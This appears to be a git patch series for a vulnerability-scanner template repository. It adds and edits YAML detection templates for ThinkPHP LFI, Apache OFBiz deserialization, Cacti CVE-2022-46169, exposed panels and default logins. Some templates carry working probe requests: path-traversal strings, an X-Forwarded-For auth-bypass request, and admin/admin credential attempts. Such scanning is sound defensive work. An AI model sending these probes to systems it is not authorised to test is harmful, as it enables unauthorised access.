header="think_lang" + tags: thinkphp,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?lang=../../thinkphp/base" + - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Call Stack' + - 'class="trace' + condition: and + + - type: status + status: + - 500 From 4b4836746fee206410ea3af547969053df799dc8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 23 Dec 2022 14:40:25 +0530 Subject: [PATCH 0591/1133] Update CVE-2021-30128.yaml --- cves/2021/CVE-2021-30128.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-30128.yaml b/cves/2021/CVE-2021-30128.yaml index 80ade242e6..439728c9a8 100644 --- a/cves/2021/CVE-2021-30128.yaml +++ b/cves/2021/CVE-2021-30128.yaml @@ -6,10 +6,12 @@ info: severity: critical description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E + - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + classification: + cve-id: CVE-2021-30128 metadata: - shodan-query: OFBiz.Visitor= + verified: true fofa-query: app="Apache_OFBiz" tags: cve,cve2021,apache,ofbiz,deserialization,rce @@ -41,11 +43,11 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol words: - "dns" - type: word part: body words: - - "errorMessage" + - 'value="errorMessage"' From dbeb8d13b946a379c68034bb5ee0afadfb4d700b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 14:53:34 +0530 Subject: [PATCH 0592/1133] fix-yaml-lint --- exposed-panels/mikrotik/mikrotik-routeros.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/mikrotik/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml index 16dc35657f..f5d6b185aa 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -26,7 +26,7 @@ requests: - 'If this device is not in your possession, please contact your local network administrator' - '.mikrotik.com' condition: and - + - type: word name: router-old part: body @@ -58,4 +58,4 @@ requests: - "

RouterOS (.+)

" - '
mikrotik routeros (.[0-9.]+) configuration page
' - 'routeros (.[0-9.]+) ' - - 'MikroTik RouterOS (.[0-9.]+)' \ No newline at end of file + - 'MikroTik RouterOS (.[0-9.]+)' From eb9c8f47c2afea2bae6af31fb771b8ac5ce4678d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Dec 2022 14:56:34 +0530 Subject: [PATCH 0593/1133] Update ws-ftp-log.yaml --- exposures/logs/ws-ftp-log.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/exposures/logs/ws-ftp-log.yaml b/exposures/logs/ws-ftp-log.yaml index cbc81003d9..8d0ab8d2ad 100644 --- a/exposures/logs/ws-ftp-log.yaml +++ b/exposures/logs/ws-ftp-log.yaml @@ -18,11 +18,10 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: word - part: body - words: - - 'C:\' - - 'D:\' + - type: regex + regex: + - '\d{4}\.\d{2}\.\d{2} \d{2}:\d{2} [A-Z] C:\\' + - '\d{4}\.\d{2}\.\d{2} \d{2}:\d{2} [A-Z] D:\\' condition: or - type: status From ed26f0776536a51adbdcfd294072abccdf7b55b8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 15:00:52 +0530 Subject: [PATCH 0594/1133] minor-update --- vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml index 3c666cbe70..36d1dd8e2a 100644 --- a/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml +++ b/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml @@ -1,11 +1,11 @@ id: thinkphp6-lang-lfi info: - name: Thinkphp lang - LFI + name: Thinkphp Lang - LFI author: kagamigawa severity: high description: | - Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to lfi. + Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI. reference: - https://tttang.com/archive/1865/ metadata: From 2b346539b9a0d94c723c5627202d847778593263 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 15:12:30 +0530 Subject: [PATCH 0595/1133] added-stop-first-match --- cves/2020/CVE-2020-11547.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index 28c961b4b5..428b26219d 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -26,6 +26,7 @@ requests: - "{{BaseURL}}/public/login.htm?type=requests" - "{{BaseURL}}/public/login.htm?type=treestat" + stop-at-first-match: true req-condition: true matchers-condition: and matchers: From c69fd59ebc4f1d1752fa11731da00816716b3298 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 23 Dec 2022 15:31:03 +0530 Subject: [PATCH 0596/1133] Update and rename n-central-login to ncentral-panel.yaml --- exposed-panels/{n-central-login => ncentral-panel.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{n-central-login => ncentral-panel.yaml} (82%) diff --git a/exposed-panels/n-central-login b/exposed-panels/ncentral-panel.yaml similarity index 82% rename from exposed-panels/n-central-login rename to exposed-panels/ncentral-panel.yaml index d9cd92e4be..3cec954949 100644 --- a/exposed-panels/n-central-login +++ b/exposed-panels/ncentral-panel.yaml @@ -1,7 +1,7 @@ -id: n-central-login +id: ncentral-panel info: - name: N-central Login + name: N-central Login Panel author: theabhinavgaur severity: info metadata: @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "ncentralVersion" + - 'class="ncentral"' - type: status status: From a6eacccd5197927413905878cc89bf8e39266f27 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 23 Dec 2022 15:55:03 +0530 Subject: [PATCH 0598/1133] Update CVE-2022-45362.yaml --- cves/2022/CVE-2022-45362.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml index e0c060bfa8..c81be0c1bd 100644 --- a/cves/2022/CVE-2022-45362.yaml +++ b/cves/2022/CVE-2022-45362.yaml @@ -28,6 +28,11 @@ requests: words: - "http" + - type: word + part: body + words: + - "paytm-payments.css" + - type: status status: - - 200 \ No newline at end of file + - 200 From e98b976c3b4723d342016631027d6b6709b7db63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Dec 2022 15:55:19 +0530 Subject: [PATCH 0599/1133] updated matcher to fix FP --- default-logins/mobotix/mobotix-default-login.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/default-logins/mobotix/mobotix-default-login.yaml b/default-logins/mobotix/mobotix-default-login.yaml index 787ede3f4c..b62d319604 100644 --- a/default-logins/mobotix/mobotix-default-login.yaml +++ b/default-logins/mobotix/mobotix-default-login.yaml @@ -15,6 +15,10 @@ info: requests: - raw: + - | + GET /control/userimage.html HTTP/1.1 + Host: {{Hostname}} + - | GET /control/userimage.html HTTP/1.1 Host: {{Hostname}} @@ -22,12 +26,10 @@ requests: matchers-condition: and matchers: - - type: word - part: body - words: - - 'Admin Menu' - - 'Setup Menu' - - 'Audio on' + - type: dsl + dsl: + - "!contains(body_1, 'Admin Menu')" + - "contains(body_2, 'Admin Menu') || contains(body_2, 'Setup Menu') || contains(body_2, 'Audio on')" condition: and - type: word From feb3910f30508f7858117fb8666fe924060b61da Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 23 Dec 2022 16:15:25 +0530 Subject: [PATCH 0600/1133] misc update --- ssl/expired-ssl.yaml | 2 +- ssl/self-signed-ssl.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ssl/expired-ssl.yaml b/ssl/expired-ssl.yaml index 578832bd61..b575690156 100644 --- a/ssl/expired-ssl.yaml +++ b/ssl/expired-ssl.yaml @@ -23,4 +23,4 @@ ssl: extractors: - type: kval kval: - - "not_after" + - "not_after" \ No newline at end of file diff --git a/ssl/self-signed-ssl.yaml b/ssl/self-signed-ssl.yaml index 06d6cdf1b0..cc3e52d1e5 100644 --- a/ssl/self-signed-ssl.yaml +++ b/ssl/self-signed-ssl.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.rapid7.com/db/vulnerabilities/ssl-self-signed-certificate/ description: | - self-signed certificates are public key certificates that are not issued by a certificate authority. These self-signed + self-signed certificates are public key certificates that are not issued by a certificate authority. These self-signed certificates are easy to make and do not cost money. However, they do not provide any trust value. remediation: | Purchase or generate a proper SSL certificate for this service. From d87088d3c73b5cf6beb26bd7fbf55b7ad2f75cbc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 16:21:17 +0530 Subject: [PATCH 0601/1133] added metadata,tags --- cves/2022/CVE-2022-45362.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml index c81be0c1bd..393b7695ed 100644 --- a/cves/2022/CVE-2022-45362.yaml +++ b/cves/2022/CVE-2022-45362.yaml @@ -14,7 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2022-45362 - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth + metadata: + verified: true + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast requests: - raw: From 11b9bc5f2efa59ccf170054d893c570e5aca85f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Dec 2022 17:42:29 +0530 Subject: [PATCH 0602/1133] updated tags --- default-logins/mobotix/mobotix-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/mobotix/mobotix-default-login.yaml b/default-logins/mobotix/mobotix-default-login.yaml index b62d319604..de1c8e67ef 100644 --- a/default-logins/mobotix/mobotix-default-login.yaml +++ b/default-logins/mobotix/mobotix-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: shodan-query: title:"Mobotix" - tags: mobotix,default-login + tags: mobotix,default-login,webcam,iot requests: - raw: From 18087c88cb5f9aca08efa7ff128302c481e552e0 Mon Sep 17 00:00:00 2001 From: Ali Abdollahi <44931102+s3verus@users.noreply.github.com> Date: Fri, 23 Dec 2022 15:49:49 +0330 Subject: [PATCH 0603/1133] add xui-weak-login template --- default-logins/xui-weak-login.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 default-logins/xui-weak-login.yaml diff --git a/default-logins/xui-weak-login.yaml b/default-logins/xui-weak-login.yaml new file mode 100644 index 0000000000..e4d9c81eb1 --- /dev/null +++ b/default-logins/xui-weak-login.yaml @@ -0,0 +1,40 @@ +id: xui-weak-login + +info: + name: x-ui Default Login + author: dali + severity: critical + description: x-ui default login credentials. + reference: + - https://github.com/vaxilu/x-ui + classification: + cwe-id: CWE-798 + tags: x-ui,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}:54321/login" + headers: + content-type: application/x-www-form-urlencoded + body: "username={{username}}&password={{password}}" + + payloads: + username: + - "admin" + password: + - "admin" + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"success":true' + condition: and + From 8af73a054ebd260431581880f2772b60d0883804 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Fri, 23 Dec 2022 12:35:53 +0000 Subject: [PATCH 0604/1133] Create CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 45 +++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 cves/2022/CVE-2022-46169.yaml diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml new file mode 100644 index 0000000000..94bcb06303 --- /dev/null +++ b/cves/2022/CVE-2022-46169.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-46169 + +info: + name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection + author: Hardik-Solanki + severity: Critical + shodan query: title:"Login to Cacti" + description: | + The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. + reference: + - https://security-tracker.debian.org/tracker/CVE-2022-46169 + - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 + - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf + - https://www.cybersecurity-help.cz/vdb/SB2022121926 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-46169 + cwe-id: CWE-285 + + metadata: + verified: true + tags: cve,cve2022,bypass,brute-force,unauth + +requests: + - raw: + - | + GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: 127.0.0.1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "[]" + - "rrd_name" + - "value" + - "local_data_id" + condition: or + + - type: status + status: + - 200 From fa8420fe9294d9e0b253680cd276f8c541d4ae77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Dec 2022 18:09:05 +0530 Subject: [PATCH 0605/1133] added tag --- cves/2022/CVE-2022-45362.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-45362.yaml b/cves/2022/CVE-2022-45362.yaml index 393b7695ed..f35ee0a085 100644 --- a/cves/2022/CVE-2022-45362.yaml +++ b/cves/2022/CVE-2022-45362.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-45362 metadata: verified: true - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm requests: - raw: From d4535b3c2606615864332850294e3a0d393c4608 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Fri, 23 Dec 2022 12:39:56 +0000 Subject: [PATCH 0606/1133] Update CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index 94bcb06303..a9b530a889 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -11,15 +11,15 @@ info: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - - https://www.cybersecurity-help.cz/vdb/SB2022121926 + - https://www.cybersecurity-help.cz/vdb/SB2022121926 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-285 + cwe-id: CWE-285 metadata: - verified: true + verified: true tags: cve,cve2022,bypass,brute-force,unauth requests: @@ -27,7 +27,7 @@ requests: - | GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 Host: {{Hostname}} - X-Forwarded-For: 127.0.0.1 + X-Forwarded-For: 127.0.0.1 matchers-condition: and matchers: @@ -35,10 +35,10 @@ requests: part: body words: - "[]" - - "rrd_name" - - "value" - - "local_data_id" - condition: or + - "rrd_name" + - "value" + - "local_data_id" + condition: or - type: status status: From efe8b7564a30866a87dbfddbb90c54e8e3a6aa5e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 18:13:00 +0530 Subject: [PATCH 0607/1133] minor-lint-update --- cves/2022/CVE-2022-46169.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index a9b530a889..da68be5953 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -1,7 +1,7 @@ id: CVE-2022-46169 info: - name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection + name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection author: Hardik-Solanki severity: Critical shodan query: title:"Login to Cacti" @@ -17,7 +17,6 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46169 cwe-id: CWE-285 - metadata: verified: true tags: cve,cve2022,bypass,brute-force,unauth @@ -38,7 +37,7 @@ requests: - "rrd_name" - "value" - "local_data_id" - condition: or + condition: and - type: status status: From aaf1a22d485812c6aa269693def72805cf8c580e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 18:15:39 +0530 Subject: [PATCH 0608/1133] fix-error --- cves/2022/CVE-2022-46169.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index da68be5953..ea95cc3c4a 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -27,7 +27,7 @@ requests: GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 - + matchers-condition: and matchers: - type: word From cbf7374914f13ec00055a4028b7b0b0f3f38e8f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 18:24:35 +0530 Subject: [PATCH 0609/1133] Update CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index ea95cc3c4a..c4c5fff9cb 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -23,11 +23,12 @@ info: requests: - raw: - - | + - |+ GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 + unsafe: true matchers-condition: and matchers: - type: word From e1f727a28e5893f4ef45bf9bc01cc3062d36dd11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 18:27:40 +0530 Subject: [PATCH 0610/1133] Update CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index c4c5fff9cb..a5ad5b3de7 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -24,8 +24,8 @@ info: requests: - raw: - |+ - GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 - Host: {{Hostname}} + GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 + Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 unsafe: true From 30146e6369a2c58c52c8e226d5d82fbf08c97a8d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 23 Dec 2022 13:01:19 +0000 Subject: [PATCH 0611/1133] Auto Generated New Template Addition List [Fri Dec 23 13:01:19 UTC 2022] :robot: --- .new-additions | 220 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 220 insertions(+) diff --git a/.new-additions b/.new-additions index ef56fab368..77080efb3a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,10 +1,230 @@ +cves/2021/CVE-2021-30128.yaml +cves/2021/CVE-2021-42887.yaml cves/2022/CVE-2022-0786.yaml cves/2022/CVE-2022-25082.yaml +cves/2022/CVE-2022-33891.yaml +cves/2022/CVE-2022-45362.yaml +default-logins/mobotix/mobotix-default-login.yaml +default-logins/tiny-file-manager-default-login.yaml +exposed-panels/content-central-login.yaml exposed-panels/creatio-login-panel.yaml +exposed-panels/loxone-panel.yaml +exposed-panels/ncentral-panel.yaml exposed-panels/posthog-admin-panel.yaml exposed-panels/webuzo-admin-panel.yaml exposed-panels/xfinity-panel.yaml +exposures/logs/ws-ftp-log.yaml +exposures/tokens/zenserp/zenscrape-api-key.yaml +exposures/tokens/zenserp/zenserp-api-key.yaml +exposures/tokens/zeplin/zeplin-access-token.yaml +exposures/tokens/zerobounce/zerobounce-api-token.yaml iot/carel-plantvisor-panel.yaml iot/hue-personal-wireless-panel.yaml +miscellaneous/gpc-json.yaml +misconfiguration/sony-bravia-disclosure.yaml network/exposed-dockerd.yaml +technologies/akamai-cache-detect.yaml technologies/aws/amazon-ec2-detect.yaml +technologies/wordpress/plugins/ad-inserter.yaml +technologies/wordpress/plugins/add-to-any.yaml +technologies/wordpress/plugins/admin-menu-editor.yaml +technologies/wordpress/plugins/adminimize.yaml +technologies/wordpress/plugins/advanced-custom-fields.yaml +technologies/wordpress/plugins/akismet.yaml +technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +technologies/wordpress/plugins/all-in-one-seo-pack.yaml +technologies/wordpress/plugins/all-in-one-wp-migration.yaml +technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +technologies/wordpress/plugins/amp.yaml +technologies/wordpress/plugins/antispam-bee.yaml +technologies/wordpress/plugins/astra-sites.yaml +technologies/wordpress/plugins/astra-widgets.yaml +technologies/wordpress/plugins/autoptimize.yaml +technologies/wordpress/plugins/backwpup.yaml +technologies/wordpress/plugins/better-search-replace.yaml +technologies/wordpress/plugins/better-wp-security.yaml +technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +technologies/wordpress/plugins/breadcrumb-navxt.yaml +technologies/wordpress/plugins/broken-link-checker.yaml +technologies/wordpress/plugins/child-theme-configurator.yaml +technologies/wordpress/plugins/classic-editor.yaml +technologies/wordpress/plugins/classic-widgets.yaml +technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +technologies/wordpress/plugins/cloudflare.yaml +technologies/wordpress/plugins/cmb2.yaml +technologies/wordpress/plugins/coblocks.yaml +technologies/wordpress/plugins/code-snippets.yaml +technologies/wordpress/plugins/coming-soon.yaml +technologies/wordpress/plugins/complianz-gdpr.yaml +technologies/wordpress/plugins/contact-form-7-honeypot.yaml +technologies/wordpress/plugins/contact-form-7.yaml +technologies/wordpress/plugins/contact-form-cfdb7.yaml +technologies/wordpress/plugins/cookie-law-info.yaml +technologies/wordpress/plugins/cookie-notice.yaml +technologies/wordpress/plugins/creame-whatsapp-me.yaml +technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +technologies/wordpress/plugins/custom-css-js.yaml +technologies/wordpress/plugins/custom-fonts.yaml +technologies/wordpress/plugins/custom-post-type-ui.yaml +technologies/wordpress/plugins/disable-comments.yaml +technologies/wordpress/plugins/disable-gutenberg.yaml +technologies/wordpress/plugins/duplicate-page.yaml +technologies/wordpress/plugins/duplicate-post.yaml +technologies/wordpress/plugins/duplicator.yaml +technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +technologies/wordpress/plugins/easy-fancybox.yaml +technologies/wordpress/plugins/easy-google-fonts.yaml +technologies/wordpress/plugins/easy-table-of-contents.yaml +technologies/wordpress/plugins/easy-wp-smtp.yaml +technologies/wordpress/plugins/elementor.yaml +technologies/wordpress/plugins/elementskit-lite.yaml +technologies/wordpress/plugins/enable-media-replace.yaml +technologies/wordpress/plugins/envato-elements.yaml +technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +technologies/wordpress/plugins/ewww-image-optimizer.yaml +technologies/wordpress/plugins/facebook-for-woocommerce.yaml +technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +technologies/wordpress/plugins/flamingo.yaml +technologies/wordpress/plugins/fluentform.yaml +technologies/wordpress/plugins/font-awesome.yaml +technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +technologies/wordpress/plugins/formidable.yaml +technologies/wordpress/plugins/forminator.yaml +technologies/wordpress/plugins/ga-google-analytics.yaml +technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +technologies/wordpress/plugins/google-listings-and-ads.yaml +technologies/wordpress/plugins/google-site-kit.yaml +technologies/wordpress/plugins/google-sitemap-generator.yaml +technologies/wordpress/plugins/gtranslate.yaml +technologies/wordpress/plugins/gutenberg.yaml +technologies/wordpress/plugins/happy-elementor-addons.yaml +technologies/wordpress/plugins/header-and-footer-scripts.yaml +technologies/wordpress/plugins/header-footer-code-manager.yaml +technologies/wordpress/plugins/header-footer-elementor.yaml +technologies/wordpress/plugins/header-footer.yaml +technologies/wordpress/plugins/health-check.yaml +technologies/wordpress/plugins/hello-dolly.yaml +technologies/wordpress/plugins/imagify.yaml +technologies/wordpress/plugins/imsanity.yaml +technologies/wordpress/plugins/insert-headers-and-footers.yaml +technologies/wordpress/plugins/instagram-feed.yaml +technologies/wordpress/plugins/intuitive-custom-post-order.yaml +technologies/wordpress/plugins/iwp-client.yaml +technologies/wordpress/plugins/jetpack.yaml +technologies/wordpress/plugins/kadence-blocks.yaml +technologies/wordpress/plugins/kirki.yaml +technologies/wordpress/plugins/leadin.yaml +technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +technologies/wordpress/plugins/limit-login-attempts.yaml +technologies/wordpress/plugins/litespeed-cache.yaml +technologies/wordpress/plugins/loco-translate.yaml +technologies/wordpress/plugins/loginizer.yaml +technologies/wordpress/plugins/loginpress.yaml +technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +technologies/wordpress/plugins/mailchimp-for-wp.yaml +technologies/wordpress/plugins/mailpoet.yaml +technologies/wordpress/plugins/maintenance.yaml +technologies/wordpress/plugins/mainwp-child.yaml +technologies/wordpress/plugins/malcare-security.yaml +technologies/wordpress/plugins/megamenu.yaml +technologies/wordpress/plugins/members.yaml +technologies/wordpress/plugins/meta-box.yaml +technologies/wordpress/plugins/ml-slider.yaml +technologies/wordpress/plugins/newsletter.yaml +technologies/wordpress/plugins/nextend-facebook-connect.yaml +technologies/wordpress/plugins/nextgen-gallery.yaml +technologies/wordpress/plugins/ninja-forms.yaml +technologies/wordpress/plugins/ocean-extra.yaml +technologies/wordpress/plugins/official-facebook-pixel.yaml +technologies/wordpress/plugins/one-click-demo-import.yaml +technologies/wordpress/plugins/optinmonster.yaml +technologies/wordpress/plugins/password-protected.yaml +technologies/wordpress/plugins/pdf-embedder.yaml +technologies/wordpress/plugins/photo-gallery.yaml +technologies/wordpress/plugins/php-compatibility-checker.yaml +technologies/wordpress/plugins/pixelyoursite.yaml +technologies/wordpress/plugins/polylang.yaml +technologies/wordpress/plugins/popup-builder.yaml +technologies/wordpress/plugins/popup-maker.yaml +technologies/wordpress/plugins/post-smtp.yaml +technologies/wordpress/plugins/post-types-order.yaml +technologies/wordpress/plugins/premium-addons-for-elementor.yaml +technologies/wordpress/plugins/pretty-link.yaml +technologies/wordpress/plugins/really-simple-captcha.yaml +technologies/wordpress/plugins/really-simple-ssl.yaml +technologies/wordpress/plugins/redirection.yaml +technologies/wordpress/plugins/redux-framework.yaml +technologies/wordpress/plugins/regenerate-thumbnails.yaml +technologies/wordpress/plugins/safe-svg.yaml +technologies/wordpress/plugins/seo-by-rank-math.yaml +technologies/wordpress/plugins/sg-cachepress.yaml +technologies/wordpress/plugins/sg-security.yaml +technologies/wordpress/plugins/shortcodes-ultimate.yaml +technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +technologies/wordpress/plugins/simple-custom-post-order.yaml +technologies/wordpress/plugins/simple-page-ordering.yaml +technologies/wordpress/plugins/siteguard.yaml +technologies/wordpress/plugins/siteorigin-panels.yaml +technologies/wordpress/plugins/smart-slider-3.yaml +technologies/wordpress/plugins/so-widgets-bundle.yaml +technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml +technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +technologies/wordpress/plugins/sucuri-scanner.yaml +technologies/wordpress/plugins/svg-support.yaml +technologies/wordpress/plugins/table-of-contents-plus.yaml +technologies/wordpress/plugins/tablepress.yaml +technologies/wordpress/plugins/taxonomy-terms-order.yaml +technologies/wordpress/plugins/the-events-calendar.yaml +technologies/wordpress/plugins/themeisle-companion.yaml 